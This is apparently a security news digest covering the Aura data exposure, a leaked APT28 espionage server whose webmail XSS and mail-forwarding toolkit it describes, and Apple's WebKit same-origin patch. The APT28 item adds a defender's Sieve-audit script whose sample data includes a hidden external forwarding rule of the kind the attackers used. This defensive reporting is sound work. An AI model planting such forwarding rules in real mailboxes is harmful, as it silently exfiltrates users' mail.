Trending Topics
Aura’s March 2026 Incident: Targeted Account Compromise and Data Exposure
In March 2026, online safety provider Aura disclosed that a single employee account was compromised for about an hour after a targeted phone‑phishing attack. During this window, an unauthorized third party accessed roughly 900,000 records tied largely to a marketing tool inherited from a company Aura acquired in 2021. Aura’s internal investigation indicates that fewer than 20,000 active customers and fewer than 15,000 former customers had their contact information exposed, and the company continues to stress that no Social Security numbers, passwords, or financial information were accessed.
The exposed data relates primarily to contact and interaction details rather than highly sensitive identity or financial fields. According to Aura, compromised data may include customer service comments, email addresses, IP addresses, names, phone numbers, and physical addresses associated with those records. All core sensitive data that underpins Aura’s protection services, such as Social Security numbers, credit files, payment information, and account credentials, remains encrypted with tightly restricted access, which Aura notes functioned as designed during the incident.
After detecting the intrusion, Aura terminated access to the compromised account, activated its incident‑response procedures, engaged external cybersecurity and legal experts, and notified law enforcement. The company is notifying affected individuals and offering support, while emphasizing that it does not expect a significant increase in risk for most affected customers. Nonetheless, the nature of the exposed data means recipients should be alert to targeted phishing, scams, or social‑engineering attempts that reference their relationship with Aura or use their contact details to build credibility. Aura has publicly acknowledged that the incident fell short of its standard for providing “peace of mind” and has committed to reinforcing safeguards to maintain customer trust.
FancyBear Server Leak Exposes Live Espionage Operations
A major operational security failure has exposed a live Russian espionage server linked to APT28/FancyBear, revealing stolen credentials, 2FA secrets, and detailed targeting of European government and military networks. Researchers from Ctrl‑Alt‑Intel, building on Hunt[.]io’s “Operation Roundish” work, identified an open directory on a C2 server at 203.161.50[.]145, hosted on Namecheap, containing C2 source code, payloads, logs, and exfiltrated data. Analysis of these archives uncovered more than 2,800 exfiltrated emails, over 240 credential sets (including TOTP 2FA secrets), around 140 persistent forwarding rules, and roughly 11,500 harvested contact addresses from compromised mailboxes. Victims included government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia, among them regional Ukrainian prosecutors, the Romanian Air Force, and Greece’s National Defence General Staff. Many are NATO members or closely aligned partners, which aligns the campaign with Russia’s interest in Ukraine‑related logistics and support. CERT‑UA had previously tied the same IP to APT28 activity involving Roundcube exploitation and ClickFix/fake reCAPTCHA phishing chains, yet FancyBear continued using the server for roughly 500 days despite that public exposure, with multiple open directories on port 8889 visible in Censys and Hunt[.]io telemetry. The root cause was a basic OPSEC lapse: leaving HTTP open directories exposed while staging payloads and storing exfiltrated data, which allowed defenders to observe the toolset and operator behavior in near real time.
The recovered toolkit centers on JavaScript payloads injected via XSS into Roundcube and, in a newer variant, SquirrelMail. Scripts in the “worker[.]js” family can identify logged‑in users, steal credentials via hidden forms, bulk‑exfiltrate Inbox and Sent folders, add Sieve forwarding rules, harvest address books, and, using keyTwoAuth[.]js, extract TOTP secrets from the twofactor_gauthenticator plugin. Another module, addRedirectMailBox[.]js, abuses ManageSieve to create persistent mail forwarding to attacker‑controlled ProtonMail accounts, maintaining long‑term access even after the initial XSS path is closed. Phishing lures used fake reCAPTCHA pages hosted on zhblz[.]com‑related domains to deliver Metasploit payloads that beaconed back to 203.161.50[.]145, and infrastructure analysis showed the server also ran Roundcube webmail, a Flask‑based C2, and Ligolo‑ng for tunneling into compromised environments. For defenders, the leak stresses the need to harden and monitor webmail platforms (Roundcube/SquirrelMail), restrict or disable ManageSieve and risky plugins, and watch for indicators such as 203.161.50[.]145 and zhblz[.]com‑hosted infrastructure when hunting for APT28 activity.
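One concrete defender-side check that follows from the forwarding-rule abuse described above: the Python below is an added example written for this digest (not part of the leaked toolkit or of any vendor product) that audits Sieve scripts as an administrator would export them over ManageSieve, flagging every `redirect` action that sends mail to a domain the organisation does not control, and noting whether the rule is unconditional and whether `:copy` hides the leak from the mailbox owner. The sample scripts, user names and domains are constructed for the example.

```python
import re

# Constructed sample Sieve scripts (made up for this example, not recovered
# data), in the form an administrator would export them from ManageSieve.
SAMPLE_SCRIPTS = {
    "alice": 'require ["fileinto"];\n'
             'if header :contains "subject" "newsletter" { fileinto "Lists"; }\n',
    "bob":   'require ["copy"];\n'
             '# keep a local copy so the mailbox owner sees nothing missing\n'
             'redirect :copy "inbox-relay@protonmail.example";\n',
    "carol": 'if address :is "from" "boss@example.gov" {\n'
             '    redirect "carol.backup@example.gov";\n'
             '}\n',
}

# Domains the organisation itself controls (constructed); forwarding to
# anything else is what the audit reports.
INTERNAL_DOMAINS = {"example.gov"}

# RFC 5228 redirect action with optional tagged arguments such as :copy.
REDIRECT_RE = re.compile(r'\bredirect\b(?P<args>[^;"]*)"(?P<addr>[^"]+)"\s*;',
                         re.IGNORECASE)


def audit_sieve(script, internal_domains=INTERNAL_DOMAINS):
    """Return one finding per redirect that forwards mail to an external domain."""
    body = re.sub(r"#[^\n]*", "", script)        # drop '#' line comments
    findings = []
    for m in REDIRECT_RE.finditer(body):
        addr = m.group("addr")
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain in internal_domains:
            continue
        prefix = body[:m.start()]
        findings.append({
            "address": addr,
            # equal brace counts before the action mean it sits outside any
            # 'if' block, i.e. every message is forwarded
            "unconditional": prefix.count("{") == prefix.count("}"),
            # :copy keeps the original, so the owner never notices the leak
            "keeps_copy": ":copy" in m.group("args").lower(),
        })
    return findings


def audit_all(scripts, internal_domains=INTERNAL_DOMAINS):
    """Map user -> findings, keeping only users whose scripts forward externally."""
    report = {}
    for user, script in scripts.items():
        findings = audit_sieve(script, internal_domains)
        if findings:
            report[user] = findings
    return report


if __name__ == "__main__":
    for user, findings in audit_all(SAMPLE_SCRIPTS).items():
        for f in findings:
            print(f"{user}: redirect to {f['address']} "
                  f"(unconditional={f['unconditional']}, keeps_copy={f['keeps_copy']})")
```

Run against a real export, only the external redirects surface, so a periodic diff of this report is a cheap way to catch rules added after the webmail path was closed.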
Apple’s Background Security Fix Closes Dangerous WebKit Same-Origin Flaw
Apple has pushed an emergency Background Security Improvement (BSI) update to fix a critical WebKit vulnerability, CVE‑2026‑20643, that could let malicious websites bypass the Same Origin Policy on iOS and macOS devices. The flaw sits in WebKit’s Navigation API and affects Safari on iOS 26.3.1, iPadOS 26.3.1, macOS 26.3.1, and macOS 26.3.2, where specially crafted web content could break the browser’s normal cross‑site isolation. Apple says it resolved the issue by tightening input validation so harmful cross‑origin navigation attempts are blocked before they can impact sensitive browser state, and has not disclosed any evidence of exploitation in the wild so far.
Because WebKit underpins Safari, many third‑party browsers on iOS and iPadOS, and numerous in‑app web views, even a single cross‑origin bug carries outsized risk. The Same Origin Policy is one of the web’s core safety rules, preventing one site from reading another site’s cookies, stored data, or active sessions; if it fails, a malicious page could interact with or exfiltrate data from other sites a user is logged into. Apple’s advisory highlights that WebKit continuously processes untrusted content and is therefore a frequent target, and that cross‑origin flaws directly attack the browser’s ability to keep data from different sites reliably separated.
This WebKit fix is one of the first high‑profile uses of Apple’s relaunched BSI pipeline, which delivers small, security‑only patches between full OS releases. These updates are applied to the latest OS branches and can be installed and rolled back independently, allowing Apple to move quickly on high‑risk components like WebKit without forcing a full system upgrade. Users and admins can manage BSIs in the Privacy & Security section rather than the standard Software Update screen: on iPhone and iPad, via Settings → Privacy & Security → Background Security Improvements; on Mac, via System Settings → Privacy & Security → Background Security Improvements.
Enabling options such as “Automatically Install” and “Security Responses & System Files” ensures these fixes are installed silently in the background, reducing the window in which similar web‑exposed vulnerabilities can be abused.